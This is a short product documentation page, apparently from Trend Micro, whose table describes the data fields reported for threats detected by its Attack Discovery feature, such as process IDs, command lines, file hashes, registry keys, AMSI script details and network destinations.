Views:

Provides general information about threats detected by Attack Discovery

Table 1. Detailed Attack Discovery Detection Information

Data

Description

Object Value

The name of the object targeted by the detected threat

Object Type

The type of object targeted by the detected threat

First Logged

The time when the threat detection was first logged by Attack Discovery

File Directory

The directory of the object targeted by the detected threat

Process ID

The PID of the process

CLI Command

The process command that triggered the threat detection

Signer

The certificate signer

User Domain

The domain name of the detected user account

User Name

The account name associated with the object

Impersonated User Name

The user name that the threat impersonated

Authentication ID

The local unique identifier assigned to the logon session

Integrity Level

The level of protection or access assigned to the logon user

File SHA-1

The SHA-1 hash value of the object file

File SHA-256

The SHA-256 hash value of the object file

File MD5

The MD5 hash value of the object file

Census Rating

The rating determined by Trend Micro threat experts based on the recorded history of the file

File Security Owner

The current owner of the file according to the file properties

File Security Owner Domain

The domain of the current owner of the file according to the file properties

File Security Previous Owner

The previous owner of the file according to the file properties

File Security Previous Owner Domain

The domain of the previous owner of the file according to the file properties

Registry Key

The registry key that the threat accessed

Registry Value Name

The registry value name that the threat accessed

Registry Value Data

The registry value data that the threat accessed

AMSI App Name

The application name or scripting language associated with the threat

AMSI App Full Path

The full path of the application associated with the threat

AMSI App Version

The application version associated with the threat

AMSI Script Source

The file name and extension of the script source

AMSI Script Content

The content of the script

AMSI Script Source SHA-1

The SHA-1 hash value of the script source

AMSI Script Source SHA-256

The SHA-256 hash value of the script source

Source IP Address

The source IP address of the detected threat

Source IP Address Port

The source IP address port number of the detected threat

Destination IP Address

The IP address that the threat accessed

Destination IP Address Port

The IP port number that the threat accessed

Destination URL

The URL that the threat accessed

Destination Domain

The domain name that the threat accessed

WMI Event

The WMI event information associated with the threat

Windows Event Source

The name of the software that logged the event according to the Windows Event Logs

Windows Event Log Content

The Windows Event log content that triggered the detection

Auth Priv Name

The Authorization Privilege Name that the threat modified

Auth Priv Attribute

The Authorization Privilege Attribute that the threat modified

Auth Priv Disable All

The status of the Authorization Privilege Disable All that the threat modified